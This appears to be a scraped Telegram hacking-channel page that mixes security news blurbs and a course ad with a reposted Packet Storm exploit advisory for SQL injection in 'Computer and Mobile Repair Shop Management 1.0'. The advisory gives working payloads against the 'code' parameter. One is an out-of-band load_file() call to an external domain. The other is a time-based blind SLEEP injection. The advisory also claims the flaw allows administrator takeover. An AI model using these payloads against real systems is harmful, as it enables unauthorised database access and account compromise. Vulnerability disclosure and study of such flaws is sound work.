Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66.1K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Dark Reading: Attacks/Breaches
Name That Edge Toon: In Your Face!

Come up with a clever caption, and our panel of experts will reward the winner with a $25 Amazon gift card.
Dark Reading: Attacks/Breaches
Log4j Highlights Need for Better Handle on Software Dependencies

Security pros say the Log4j vulnerability is another warning call for enterprises to get more disciplined when keeping track of software bills of materials.
100%OFF | Pentesters Practical Approach for Bug Hunting and Bug Bounty

Welcome to this course on Pentesters Practical Approach for Bug Hunting and Bug Bounty. To enjoy this course, you need a positive attitudeContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Computer And Mobile Repair Shop Management 1.0 SQL Injection

https://4.bp.blogspot.com/-jEyO8wrBbtw/WWlvSr9oRmI/AAAAAAAAINg/irp20P4NPo4dOJoHHzIQ0XpAovWCMUh6wCLcBGAs/s1600/h38.png
Computer And Mobile Repair Shop Management version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | c25474e7d98558e891f792ea5d29c090

Download
## Title: Computer and Mobile Repair Shop Management-1.0 SQL - Injections
## Author: nu11secur1ty
## Date: 12.28.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15108/computer-and-mobile-repair-shop-management-system-using-phpoop-free-source-code.html

## Description:
The `code` parameter from /rsms/ node app, on Computer and Mobile
Repair Shop Management-1.0 appears to be vulnerable to SQL injection
attacks.
The payload '+(select
load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+'
was submitted in the code parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take administrator account control on this system.

[+] Payloads:

```mysql
---
Parameter: code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_status&code=202778'+(select
load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+''
AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/RSMS-1.0)

## Proof and Exploit:
[href](https://streamable.com/aa69kd)


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video